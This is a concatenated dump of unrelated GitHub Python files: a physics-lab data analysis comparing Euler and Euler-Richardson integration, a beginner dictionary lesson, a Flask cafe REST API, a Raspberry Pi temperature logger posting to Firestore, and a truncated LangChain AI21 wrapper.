estimated and may need adjustment\n#\n#\n## The plots are not final; they are here mainly for visualization and testing\n\n############ Constants ###########\n\ng = 9.8 # gravitational acceleration (m/s^2)\npar = 1.2 # air density (kg/m^3)\n\n########## Block on ramp #########\nthetar = 6 * math.pi / 180 # inclination (rad)\nD = 3.64 # distance traveled (m)\nmr = 0.34 # mass of the block (g)\nAr = 0.008 # frontal area of the block (m^2)\nr = [] # list to store the accelerometer data\n\nfor i in range(5):\n # reading accelerometer data\n r.append(pd.read_csv('r' + str(i+1) + '.csv'))\n \n\n############### MCU ###############\nR = 2.1 # radius (m)\nt = pd.read_csv('mcu.csv') # table with the lap time data\nc = [] # list to store the times measured for each experiment\n\nfor i in range(5):\n c.append(t.loc[t['rep'] == i+1])\n c[i] = c[i].reset_index()\n c[i] = c[i].filter(items=['time', 'theta'])\n\n############# Pendulum #############\nl = 0.823 # length of the strings (m)\na = 0.051 # width of the basket (m)\nb = 0.144 # length of the basket (m)\nL = math.sqrt(l**2 - (a/2)**2 - (b/2)**2) # length of the pendulum's imaginary string (m)\nmp = 0.23 # mass of the pendulum (kg)\nAp = 0.0059 # frontal area of the pendulum (m^2)\np = [] # list to store the gyroscope data\ntmin_p = [7.05, 5.15, 5.2, 5.15, 5.3] # initial times (s)\ntheta0 = [] # initial inclination\n\nfor i in range(5):\n # reading gyroscope data\n p.append(pd.read_csv('p' + str(i+1) + '.csv'))\n \n \n##################################\n# DATA CLEANING #\n##################################\n \n########## Block on ramp #########\n \ntmin_r = [4.7, 2.9, 6.2, 4.6, 4.5] # estimated initial times (s)\n\nfor i in range(5):\n # removing variables that will not be used\n r[i] = r[i].filter(items=['time', 'gFx'])\n r[i].columns = ['time', 'a']\n # removing data before the estimated initial time\n r[i] = r[i].loc[r[i]['time'] >= tmin_r[i]]\n r[i] = r[i].reset_index(drop = True)\n # converting values to m/s^2\n r[i].update(pd.Series(r[i]['a'] * g, name = 'a')) \n # 'zeroing' the time\n r[i].update(pd.Series(r[i]['time'] - tmin_r[i], name = 'time'))\n # computing the experimental velocities\n r[i]['v'] = integrate(r[i]['time'], r[i]['a'])\n # computing the experimental displacement\n r[i]['d'] = integrate(r[i]['time'], r[i]['v'])\n # filtering out data with displacement greater than the total ramp length\n r[i] = r[i].loc[r[i]['d'] <= D]\n \n############### MCU ###############\n \nfor i in range(5):\n c[i]['theta'][0] = 1*math.pi\n c[i]['theta'][1] = 2*math.pi\n for j in [2, 4]:\n c[i]['theta'][j] = (j+1)*math.pi\n c[i]['theta'][j+1] = (j+2)*math.pi\n c[i]['time'][j] += c[i]['time'][j-1]\n c[i]['time'][j+1] += c[i]['time'][j-1]\n c[i]['w'] = derivate(c[i]['time'], c[i]['theta'], y0 = c[i]['theta'][0] / c[i]['time'][0])\n \n############# Pendulum #############\n \ntmin_p = [7.05, 5.15, 5.2, 5.15, 5.3] # estimated initial times (s)\n\nfor i in range(5):\n # removing variables that will not be used\n p[i] = p[i].filter(items=['time', 'wx'])\n p[i].columns = ['time', 'w']\n # removing data outside the target interval\n p[i] = p[i].loc[(p[i]['time'] >= tmin_p[i]) & (p[i]['time'] <= tmin_p[i] + 30)]\n p[i] = p[i].reset_index(drop = True)\n # 'zeroing' the time\n p[i].update(pd.Series(p[i]['time'] - tmin_p[i], name = 'time'))\n # computing the experimental inclination\n p[i]['theta'] = integrate(p[i]['time'], p[i]['w'])\n # estimating the initial inclination\n theta0.append(-max(p[i]['theta']) / 
2)\n # recomputing the experimental inclination\n p[i].update(pd.Series(integrate(p[i]['time'], p[i]['w'], y0 = theta0[i]), name = 'theta'))\n # computing the angular acceleration\n p[i]['a'] = derivate(p[i]['time'], p[i]['w'], y0 = g * math.sin(theta0[i]) / L)\n\n##################################\n# EXPERIMENTAL PLOTS #\n##################################\n\n########## Block on ramp ######### \n\nplot_experimentos(r, ['d', 'v', 'a'], labels = ['Linear Displacement', 'Linear Velocity', 'Linear Acceleration'], units = ['m', 'm/s', r'm/s$^2$'], exp = 'Block on a Ramp')\n\n############### MCU ###############\n\nplot_experimentos(c, ['theta', 'w'], labels = ['Angular Displacement', 'Angular Velocity'], units = ['rad', 'rad/s'], exp = 'Uniform Circular Motion')\n\n############# Pendulum ############# \n\nplot_experimentos(p, ['theta', 'w', 'a'], labels = ['Angular Displacement', 'Angular Velocity', 'Angular Acceleration'], units = ['rad', 'rad/s', r'rad/s$^2$'], exp = 'Pendular Motion')\n\n##################################\n# MODEL #\n##################################\n\nre = r[0]\nce = c[0]\npe = p[0]\n\nfor i in range(1,5):\n re = re.append(r[i], ignore_index = True)\n ce = ce.append(c[i], ignore_index = True)\n pe = pe.append(p[i], ignore_index = True)\n\n########## Block on ramp #########\n\nBr = par * Ar / mr * 4\nAr = g * math.sin(thetar)\n\ntmax = max(re['time'])\n\ndt = 0.001\n\neur1 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'd' : 0.0,\n 'v' : 0.0,\n 'a' : 0.0})\n\neur1['d'][0] = 0.0\neur1['v'][0] = 0.0\neur1['a'][0] = Ar\n \nfor i in range(1, len(eur1)):\n eur1['d'][i] = eur1['d'][i-1] + eur1['v'][i-1] * dt\n eur1['v'][i] = eur1['v'][i-1] + eur1['a'][i-1] * dt\n eur1['a'][i] = Ar - Br * eur1['v'][i] ** 2\n\neur2 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'd' : 0.0,\n 'v' : 0.0,\n 'a' : 0.0})\n\neur2['d'][0] = 0.0\neur2['v'][0] = 0.0\neur2['a'][0] = Ar\n \nfor i in range(1, len(eur2)):\n vmid = eur2['v'][i-1] + eur2['a'][i-1] * dt / 2\n amid = Ar - Br * vmid ** 2\n eur2['v'][i] = eur2['v'][i-1] + amid * dt\n eur2['d'][i] = eur2['d'][i-1] + vmid * dt\n eur2['a'][i] = Ar - Br * eur2['v'][i] ** 2\n \nerro(re, eur1, eur2, 'd')\nerro(re, eur1, eur2, 'v')\nerro(re, eur1, eur2, 'a')\n\n\n############### MCU ###############\n\nwc = np.mean(ce['w'])\n\ntmax = max(ce['time'])\n \neuc1 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0})\n\neuc1['theta'][0] = 0.0\n \nfor i in range(1, len(euc1)):\n euc1['theta'][i] = euc1['theta'][i-1] + wc * dt\neuc1['w'] = wc\n\neuc2 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0})\n\neuc2['theta'][0] = 0.0\n \nfor i in range(1, len(euc2)):\n euc2['theta'][i] = euc2['theta'][i-1] + wc * dt\neuc2['w'] = wc\n \nerro(ce, euc1, euc2, 'theta')\nerro(ce, euc1, euc2, 'w')\n\n############# Pendulum #############\n\nBp = par * Ap * L / mp\nthetap0 = np.mean(theta0)\nAp = g / L\n\ntmax = max(pe['time'])\n\neup1 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0,\n 'w' : 0.0,\n 'a' : 0.0})\n\neup1['theta'][0] = thetap0\neup1['w'][0] = 0.0\neup1['a'][0] = - Ap * math.sin(thetap0)\n \nfor i in range(1, len(eup1)):\n eup1['theta'][i] = eup1['theta'][i-1] + eup1['w'][i-1] * dt\n eup1['w'][i] = eup1['w'][i-1] + eup1['a'][i-1] * dt\n eup1['a'][i] = -Ap * math.sin(eup1['theta'][i]) - Bp * eup1['w'][i] * abs(eup1['w'][i])\n\neup2 = pd.DataFrame({'time' : list(frange(0.0, tmax, dt)),\n 'theta' : 0.0,\n 'w' : 0.0,\n 'a' : 0.0})\n\neup2['theta'][0] = thetap0\neup2['w'][0] = 
0.0\neup2['a'][0] = - Ap * math.sin(thetap0)\n \nfor i in range(1, len(eup2)):\n thetamid = eup2['theta'][i-1] + eup2['w'][i-1] * dt / 2\n wmid = eup2['w'][i-1] + eup2['a'][i-1] * dt / 2\n amid = -Ap * math.sin(thetamid) - Bp * wmid * abs(wmid)\n eup2['theta'][i] = eup2['theta'][i-1] + wmid * dt\n eup2['w'][i] = eup2['w'][i-1] + amid * dt\n eup2['a'][i] = -Ap * math.sin(eup2['theta'][i]) - Bp * eup2['w'][i] * abs(eup2['w'][i])\n \nerro(pe, eup1, eup2, 'theta')\nerro(pe, eup1, eup2, 'w')\nerro(pe, eup1, eup2, 'a')\n \n \n##################################\n# PLOTS #\n##################################\n\n########## Block on ramp #########\n\nplot_modelos(re, eur1, eur2, ['d', 'v', 'a'], labels = ['Linear Displacement', 'Linear Velocity', 'Linear Acceleration'], units = ['m', 'm/s', r'm/s$^2$'], exp = 'Block on a Ramp')\n\n############### MCU ###############\n\nplot_modelos(ce, euc1, euc2, ['theta', 'w'], labels = ['Angular Displacement', 'Angular Velocity'], units = ['rad', 'rad/s'], exp = 'Uniform Circular Motion')\n\n############# Pendulum ############# \n\nplot_modelos(pe, eup1, eup2, ['theta', 'w', 'a'], labels = ['Angular Displacement', 'Angular Velocity', 'Angular Acceleration'], units = ['rad', 'rad/s', r'rad/s$^2$'], exp = 'Pendular Motion')\n","repo_name":"SisiBakaMuyo/mac0209","sub_path":"EP2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
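The only difference between the eur1/euc1/eup1 loops (Euler) and the eur2/euc2/eup2 loops (Euler-Richardson) is that the latter advance using derivatives sampled at the half step, which buys second-order accuracy. A standalone comparison on dv/dt = -v, whose exact solution is e^(-t):

import math

def euler(dt, tmax=1.0):
    v = 1.0
    for _ in range(round(tmax / dt)):
        v += -v * dt               # slope taken at the start of the step
    return v

def euler_richardson(dt, tmax=1.0):
    v = 1.0
    for _ in range(round(tmax / dt)):
        vmid = v + (-v) * dt / 2   # half-step (midpoint) estimate
        v += -vmid * dt            # advance using the midpoint slope
    return v

exact = math.exp(-1.0)
for dt in (0.1, 0.01):
    print(dt, abs(euler(dt) - exact), abs(euler_richardson(dt) - exact))
# a 10x smaller dt cuts the Euler error ~10x (first order)
# and the Euler-Richardson error ~100x (second order)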
+{"seq_id":"34726769339","text":"alien_0 = {'color':'green','point':5}\nalien_1 = {'color':'red','point':15}\nalien_2 = {'color':'yellow','point':10}\naliens = [alien_0,alien_1,alien_2]\nprint('# 列表中存字典')\nfor alien in aliens:\n print(alien)\n\nprint('\\n# 10个外星人')\naliens=[]\nfor i in range(10):\n newAlien = {'speed':'slow','color':'green','point':5}\n aliens.append(newAlien)\n\nfor alien in aliens:\n print(alien)\nprint(len(aliens))\n\nprint('\\n# 改变前3个外星人的属性')\nfor alien in aliens[:3]:\n alien['color']='yellow'\n alien['speed']='medium'\n alien['point']=10\n\nfor alien in aliens:\n print(alien)\n\nprint('\\n# 字典中存列表````')\nprint(\"name_language = {\\n'me':['js','python'],\\n'fay':['java','js']\\n}\")\n\nname_language = {\n 'me':['js','python'],\n 'fay':['java','js'],\n 'lool':['java']\n}\nfor name,language in name_language.items():\n print(name)\n for l in language:\n print('\\t' + l)\n\nprint('\\n# 字典中存字典')\nusers ={\n 'Messie':{\n 'first':'Zhang',\n 'last':'Messie',\n 'location':'China'\n },\n\n 'Kaka':{\n 'first':'Sheng',\n 'last':'kaka',\n 'location':'Brazil'\n },\n}\nusers['C_ronarido'] = {\n 'first':'Stiyano',\n 'last':'C_ronarido',\n 'location':'Potora',\n}\nfor name,info in users.items():\n print('\\nPlayer name is ' + name)\n print('Player full name is ' + info['first'] + info['last'])\n print('Player is from ' + info['location'])\n","repo_name":"zd6515843/super_chen","sub_path":"PythonSelfStudy/Lession01-09/lession_06_嵌套.py","file_name":"lession_06_嵌套.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"32148721843","text":"import requests\nimport logging\nimport os\n\n\ndef post_to_server(video_title, accuracy, warning):\n # http://183.81.35.24:5010/api/msg_warning/Update?title=Em giờ nơi ấy có ổn không ? Em ừ đi anh thấy yên lòng ~ huy Vạc cover hay nhất 2019&accuracy=10&timer=12\n headers = {'content-type': 'application/json'}\n url = 'http://183.81.35.24:5010/api/msg_warning/Update'\n params = {'title': video_title, 'accuracy': accuracy, 'timer': '0', 'warning': warning}\n print(params)\n # req = requests.post(url, params=params, headers=headers)\n\n\nloggers_dict = {}\n# Logging\nLOGLEVEL = 20 # logging.INFO\nLOG_FORMAT = \"%(name)-20s %(levelname)-8s %(message)s\"\nFILE_LOGLEVEL = 10 # logging.DEBUG\nFILE_LOG_FORMAT = \"%(asctime)s %(name)-20s %(levelname)-8s %(message)s\"\n\n\n# --- Logging utilities --------------------------------------------------------\ndef add_file_handler(logger, log_filepath, loglevel=FILE_LOGLEVEL,\n log_format=FILE_LOG_FORMAT):\n \"\"\"Add a file handler to the logger.\"\"\"\n file_handler = logging.FileHandler(log_filepath)\n file_handler.setLevel(loglevel)\n file_handler.setFormatter(logging.Formatter(log_format))\n logger.addHandler(file_handler)\n\n\ndef setup_loggers(log_dir, loglevel=FILE_LOGLEVEL, log_format=FILE_LOG_FORMAT):\n \"\"\"Setup the loggers with file handlers.\"\"\"\n for name in logging.Logger.manager.loggerDict.keys():\n if name.startswith('music'):\n add_file_handler(\n logging.getLogger(name), os.path.join(log_dir, name + '.log'),\n loglevel, log_format)\n","repo_name":"Minh112/Check_copyright_video","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"4142736270","text":"import math\r\nnum1= int(input (\"numero por favor \"))\r\nnum2= int(input (\"numero por favor \"))\r\n\r\ntop=num2+1\r\n\r\nfor x in range(num1, top):\r\n verificador=0\r\n num=(x)\r\n raiz= int(math.sqrt(num)+1)\r\n for i in range (2,raiz):\r\n divisor= num%i\r\n if divisor==0:\r\n verificador+=1\r\n \r\n if verificador==0:\r\n print (\"El numero \" + format(num) + \" es primo y tiene \" + format(verificador) +\" divisores\")\r\n\r\n else:\r\n print (\"El numero \" + format(num) + \" no es primo\")\r\n","repo_name":"bibliofilica/NumerosPrimos","sub_path":"primo rango.py","file_name":"primo rango.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72225623902","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n# Graficas de los pulsos en los canales adquiridos.\n# Los archivos a analizar pueden tener la extensión .dat o .bz2\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nN=5000 # Número de puntos a graficar\n\ndata_dir = 'data/' # Directorio donde se encuentran los datos\nplot_dir = 'plot/' # Directorio donde se guardaran las graficas\nfilename = input('Ingrese el nombre del archivo (*.dat o *.bz2) a procesar : ')\n#filename= 'spnk_nogps_2021_07_23_03h00.dat.bz2' # Nombre del archivo a graficar\n\nch1, ch2 = np.loadtxt(os.path.join(data_dir, filename), unpack=1, dtype=int)\n\nx=np.linspace(0,N,N-1)\nfig,ax = plt.subplots(nrows=1, ncols=1, figsize=(11,7))\n\nax.step(x,ch1[:N-1], 'r-.',lw=1, label='CH1')\nax.step(x,ch2[:N-1], 'b.-',lw=1, label='CH2')\n\n#ax.plot(ch1, 'r-o',lw=1, label='CH1')\n#ax.plot(ch2, 'b.-',lw=1, label='CH2')\n\nax.legend(fontsize=11)\nax.grid()\nax.set_xlim(0,1500)\nax.set_ylabel('Amplitude (ADC)',fontsize=14)\nax.set_xlabel('Time (ADC.bin)',fontsize=14)\n\nplt.savefig(os.path.join(plot_dir,'pulses_{}.png'.format(filename)))\nplt.show()\n\n","repo_name":"lharnaldi/acq_scripts","sub_path":"python/0_channels.py","file_name":"0_channels.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"3136789307","text":"import flask.json\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy # pip install Flask-SQLAlchemy\nimport random\nimport json\nimport os\n\n# The API documentation is viewable at https://documenter.getpostman.com/view/15623189/TzRNEV41\n\n\nAPI_KEY = \"MySecretAPIKey\"\nFILE_URL = 'sqlite:///database/cafes.db'\napp = Flask(__name__)\n\n\"\"\"\n DEFAULT FLASK APP CONFIGURATION\n ===============================\n default_config = {\n 'APPLICATION_ROOT': '/',\n 'DEBUG': None,\n 'ENV': None,\n 'EXPLAIN_TEMPLATE_LOADING': False,\n 'JSONIFY_MIMETYPE': 'application/json',\n 'JSONIFY_PRETTYPRINT_REGULAR': False,\n 'JSON_AS_ASCII': True,\n 'JSON_SORT_KEYS': True,\n 'MAX_CONTENT_LENGTH': None,\n 'MAX_COOKIE_SIZE': 4093,\n 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days = 31),\n 'PREFERRED_URL_SCHEME': 'http',\n 'PRESERVE_CONTEXT_ON_EXCEPTION': None,\n 'PROPAGATE_EXCEPTIONS': None,\n 'SECRET_KEY': None,\n 'SEND_FILE_MAX_AGE_DEFAULT': None,\n 'SERVER_NAME': None,\n 'SESSION_COOKIE_DOMAIN': None,\n 'SESSION_COOKIE_HTTPONLY': True,\n 'SESSION_COOKIE_NAME': 'session',\n 'SESSION_COOKIE_PATH': None,\n 'SESSION_COOKIE_SAMESITE': None,\n 'SESSION_COOKIE_SECURE': False,\n 'SESSION_REFRESH_EACH_REQUEST': True,\n 'TEMPLATES_AUTO_RELOAD': None,\n 'TESTING': False,\n 'TRAP_BAD_REQUEST_ERRORS': None,\n 'TRAP_HTTP_EXCEPTIONS': False,\n 'USE_X_SENDFILE': False\n }\n\"\"\"\n\n# Connect to Database\napp.config['SQLALCHEMY_DATABASE_URI'] = FILE_URL\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\n# Cafe TABLE Configuration\nclass Cafe(db.Model):\n __tablename__ = \"Cafes\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), unique=True, nullable=False)\n map_url = db.Column(db.String(500), nullable=False)\n img_url = db.Column(db.String(500), nullable=False)\n location = db.Column(db.String(250), nullable=False)\n seats = db.Column(db.String(250), nullable=False)\n has_toilet = db.Column(db.Boolean, nullable=False)\n has_wifi = db.Column(db.Boolean, nullable=False)\n has_sockets = db.Column(db.Boolean, nullable=False)\n can_take_calls = db.Column(db.Boolean, nullable=False)\n coffee_price = db.Column(db.String(250), nullable=True)\n\n # Angela's method: Convert database record to a dictionary\n def to_dict(self):\n # # Method 1.\n # dictionary = {}\n # # Loop through each column in the data record\n # for column in self.__table__.columns:\n # # Create a new dictionary entry;\n # # where the key is the name of the column\n # # and the value is the value of the column\n # dictionary[column.name] = getattr(self, column.name)\n # return dictionary\n\n # Method 2. 
Alternatively use Dictionary Comprehension to do the same thing.\n return {column.name: getattr(self, column.name) for column in self.__table__.columns}\n\n\n# Create the database file and tables\nif not os.path.isfile(FILE_URL):\n db.create_all()\n\n\n# HOME PAGE\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n \n\n# HTTP GET - Read Records\n\n@app.route(\"/random\", methods=[\"GET\"])\ndef get_random_cafe():\n # get a random cafe from the database\n # Select all results from the search \n all_cafes = db.session.query(Cafe).all()\n random_cafe = random.choice(all_cafes)\n # Turn the random cafe SQLAlchemy Object into a JSON Response object\n\n # # The original manual dictionary method\n # cafe = {\n # 'id': random_cafe.id,\n # 'name': random_cafe.name,\n # 'map_url': random_cafe.map_url,\n # 'img_url': random_cafe.img_url,\n # 'location': random_cafe.location,\n # 'seats': random_cafe.seats,\n # 'has_toilet': random_cafe.has_toilet,\n # 'has_wifi': random_cafe.has_wifi,\n # 'has_sockets': random_cafe.has_sockets,\n # 'can_take_calls': random_cafe.can_take_calls,\n # 'coffee_price': random_cafe.coffee_price,\n # }\n # return jsonify(cafe=cafe)\n\n # # This method saves me having to manually type out the dictionary\n # cafe = jsonify(\n # # jsonify the dictionary\n # cafe=jsonify(\n # # jsonify the cafe data\n # id=random_cafe.id,\n # name=random_cafe.name,\n # map_url=random_cafe.map_url,\n # img_url=random_cafe.img_url,\n # location=random_cafe.location,\n # seats=random_cafe.seats,\n # has_toilet=random_cafe.has_toilet,\n # has_wifi=random_cafe.has_wifi,\n # has_sockets=random_cafe.has_sockets,\n # can_take_calls=random_cafe.can_take_calls,\n # coffee_price=random_cafe.coffee_price,\n # ).json # convert the Response object to a dictionary\n # )\n # return cafe\n\n # Even better solution from Angela: add to_dict() function to the class\n # Simply convert the random_cafe data record to a dictionary of key-value pairs.\n # 200 \tOK \tAction completed successfully\n return jsonify(cafes=random_cafe.to_dict()), 200\n\n\n@app.route(\"/all\", methods=[\"GET\"])\ndef get_all_cafes():\n # get all cafes from the database\n # Select all results from the search \n all_cafes = db.session.query(Cafe).all()\n # combine into a list of dictionaries\n all_cafes_dict = [cafe.to_dict() for cafe in all_cafes]\n \"\"\"\n {\n \"all_cafes\": [\n {\n \"can_take_calls\": true, \n \"coffee_price\": \"\\u00a32.40\", \n \"has_sockets\": true, \n \"has_toilet\": true, \n \"has_wifi\": false, \n \"id\": 1, \n \"img_url\": \"https://atlondonbridge.com/wp-content/uploads/2019/02/Pano_9758_9761-Edit-190918_LTS_Science_Gallery-Medium-Crop-V2.jpg\", \n \"location\": \"London Bridge\", \n \"map_url\": \"https://g.page/scigallerylon?share\", \n \"name\": \"Science Gallery London\", \n \"seats\": \"50+\"\n }, \n ...\n ]\n }\n \"\"\"\n # 200 \tOK \tAction completed successfully\n return jsonify(cafes=all_cafes_dict), 200\n\n\n@app.route(\"/search\", methods=[\"GET\"])\ndef find_cafes():\n # Get value from URL query string e.g. 
http://127.0.0.1:5006/search?loc=Peckham\n # https://flask.palletsprojects.com/en/1.1.x/api/#flask.Request.args\n location = request.args.get('loc')\n # Select all results from the search \n found_cafes = db.session.query(Cafe).filter_by(location=location).all()\n if found_cafes:\n # combine into a list of dictionaries\n # 200 \tOK \tAction completed successfully\n return jsonify(cafes=[cafe.to_dict() for cafe in found_cafes]), 200\n else:\n # 404 \tNot Found \tRequested file was not found\n return jsonify(error={\"Not Found\": \"Sorry, we don't have a cafe at that location.\"}), 404\n\n\n# HTTP POST - Create Record\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add_cafe():\n def check_bool(value):\n return 1 if value == '1' or value.lower() == 'true' else 0\n\n # Get field values from request body and create a new Cafe object\n # request.form returns an immutable dictionary (ImmutableMultiDict)\n # the boolean values must be blank, 0 or 1\n data = request.form\n new_cafe = Cafe(\n name=data['name'],\n map_url=data['map_url'],\n img_url=data['img_url'],\n location=data['location'],\n seats=data['seats'],\n has_toilet=check_bool(data['has_toilet']),\n has_wifi=check_bool(data['has_wifi']),\n has_sockets=check_bool(data['has_sockets']),\n can_take_calls=check_bool(data['can_take_calls']),\n coffee_price=data['coffee_price'],\n )\n # Check if cafe is already in the database\n # Select all results from the search \n search_cafe = db.session.query(Cafe).filter_by(\n name=new_cafe.name,\n location=new_cafe.location\n ).all()\n if search_cafe:\n # 400 \tBad Request\n # Request had bad syntax or was impossible to fulfill\n return jsonify(error={\"exists\": \"Cafe already exists.\"}), 400\n else:\n # Add cafe to database\n db.session.add(new_cafe)\n db.session.commit()\n # 200 \tOK \tAction completed successfully\n return jsonify(response={\"success\": \"Successfully added the new cafe.\"}), 200\n\n\n# HTTP PUT/PATCH - Update Record\n\n@app.route(\"/update-price/<int:cafe_id>\", methods=[\"PATCH\"])\ndef update_price(cafe_id):\n # Get value from URL query string e.g. 
http://127.0.0.1:5006/search?loc=Peckham\n # https://flask.palletsprojects.com/en/1.1.x/api/#flask.Request.args\n new_price = request.args.get('new-price')\n # Select the first match from the search: \n cafe = db.session.query(Cafe).filter_by(\n id=int(cafe_id),\n ).first()\n # Angela used:\n # cafe = db.session.query(Cafe).get(cafe_id)\n if cafe:\n # print(\"cafe =\", cafe, type(cafe)) # >>> cafe = \n cafe.coffee_price = new_price\n db.session.commit()\n # 200 \tOK \tAction completed successfully\n return jsonify(response={\"success\": f\"Price updated to {cafe.coffee_price} for {cafe.name}.\"}), 200\n else:\n # 404 \tNot Found \tRequested file was not found\n return jsonify(error={\"Not Found\": f\"A cafe with ID={cafe_id} was not found.\"}), 404\n\n\n# HTTP DELETE - Delete Record\n\n@app.route(\"/report-closed/<int:cafe_id>\", methods=[\"DELETE\"])\ndef delete_cafe(cafe_id):\n key_data = request.form['api-key']\n if key_data == API_KEY:\n # delete the entry\n cafe = db.session.query(Cafe).get(cafe_id)\n if cafe:\n db.session.delete(cafe)\n db.session.commit()\n # 200 \tOK \tAction completed successfully\n return jsonify(response={\"success\": f\"Cafe {cafe.name} removed from database.\"}), 200\n else:\n # 404 \tNot Found \tRequested file was not found\n return jsonify(error={\"Not Found\": f\"A cafe with ID={cafe_id} was not found.\"}), 404\n else:\n # 403 \tForbidden\n # Request does not specify the file name, or the directory\n # or the file does not have the permission that allows the pages to be viewed from the web\n return jsonify(error={\"Forbidden\": \"Not Authorized to delete a cafe.\"}), 403\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5006)\n","repo_name":"SadSack963/day-66_REST_API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
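A client-side sketch of exercising these endpoints with requests, assuming the server is running locally on port 5006 as in __main__ (the cafe field values are made up; the field names match the /add handler):

import requests

BASE = 'http://127.0.0.1:5006'

print(requests.get(f'{BASE}/random').json())
print(requests.get(f'{BASE}/search', params={'loc': 'Peckham'}).json())

new_cafe = {
    'name': 'Test Cafe', 'map_url': 'http://example.com/map',
    'img_url': 'http://example.com/img.png', 'location': 'Peckham',
    'seats': '20-30', 'has_toilet': '1', 'has_wifi': '1',
    'has_sockets': '0', 'can_take_calls': '0', 'coffee_price': '£2.50',
}
print(requests.post(f'{BASE}/add', data=new_cafe).json())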
+{"seq_id":"42373131995","text":"import sys\nimport os\nimport glob\nimport time\nimport json\nimport firebase_admin\n\nfrom datetime import datetime\nfrom firebase_admin import credentials\nfrom google.cloud import firestore\n\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\nproject_id = \"smart-water-168ca\"\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"/home/pi/Desktop/smart-water-168ca-d9f996738e27.json\"\ncred = credentials.ApplicationDefault()\nfirebase_admin.initialize_app(cred, {\n 'projectId': project_id,\n})\ndb = firestore.Client()\n \ndef generateID():\n data = datetime.now()\n sensorBase_ref = db.collection(u'sensorBase').document()\n sensorBase_ref.set({\n \"registration\": data,\n \"location\": \"\"\n })\n return sensorBase_ref.id\n \ndef getSensorBase_id():\n overwrite = False\n id_sensorBase = 0\n \n try:\n with open('sensorBase.json', 'r') as f:\n \n jsonfile = f.read()\n sensorBase_json = json.loads(jsonfile)\n\n if sensorBase_json['id_sensorBase'] == False:\n id_sensorBase = generateID()\n overwrite = True\n else:\n id_sensorBase = sensorBase_json['id_sensorBase']\n \n except:\n id_sensorBase = generateID()\n overwrite = True\n \n if overwrite == True:\n with open('sensorBase.json', 'w+') as f: \n datastore = {\"id_sensorBase\": id_sensorBase}\n json.dump(datastore, f)\n \n return id_sensorBase\n\nidSensorBase= getSensorBase_id()\n\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n \ndef read_temp():\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n temp_f = temp_c * 9.0 / 5.0 + 32.0\n \n data = {\n \"celsius\": temp_c,\n }\n \n return data\n\nwhile True:\n\n jsonTemp = read_temp()\n data = datetime.now()\n jsonTemp['id_sensorBase'] =idSensorBase\n jsonTemp['datatime'] =data\n\n doc_base = db.collection(u'sensorBase/'+idSensorBase+\"/sensorData\")\n doc_base.add(jsonTemp)\n print(\"Deu Certo!\")\n time.sleep(10)\n\n\n","repo_name":"maathh/Water-IOT","sub_path":"Raspberry/base_monitoramento.py","file_name":"base_monitoramento.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24559822967","text":"from typing import Any, Dict, List, Optional, cast\n\nimport requests\nfrom langchain_core.callbacks import CallbackManagerForLLMRun\nfrom langchain_core.language_models.llms import LLM\nfrom langchain_core.pydantic_v1 import BaseModel, Extra, SecretStr, root_validator\nfrom langchain_core.utils import convert_to_secret_str, get_from_dict_or_env\n\n\nclass AI21PenaltyData(BaseModel):\n \"\"\"Parameters for AI21 penalty data.\"\"\"\n\n scale: int = 0\n applyToWhitespaces: bool = True\n applyToPunctuations: bool = True\n applyToNumbers: bool = True\n applyToStopwords: bool = True\n applyToEmojis: bool = True\n\n\nclass AI21(LLM):\n \"\"\"AI21 large language models.\n\n To use, you should have the environment variable ``AI21_API_KEY``\n set with your API key or pass it as a named parameter to the constructor.\n\n Example:\n .. code-block:: python\n\n from langchain_community.llms import AI21\n ai21 = AI21(ai21_api_key=\"my-api-key\", model=\"j2-jumbo-instruct\")\n \"\"\"\n\n model: str = \"j2-jumbo-instruct\"\n \"\"\"Model name to use.\"\"\"\n\n temperature: float = 0.7\n \"\"\"What sampling temperature to use.\"\"\"\n\n maxTokens: int = 256\n \"\"\"The maximum number of tokens to generate in the completion.\"\"\"\n\n minTokens: int = 0\n 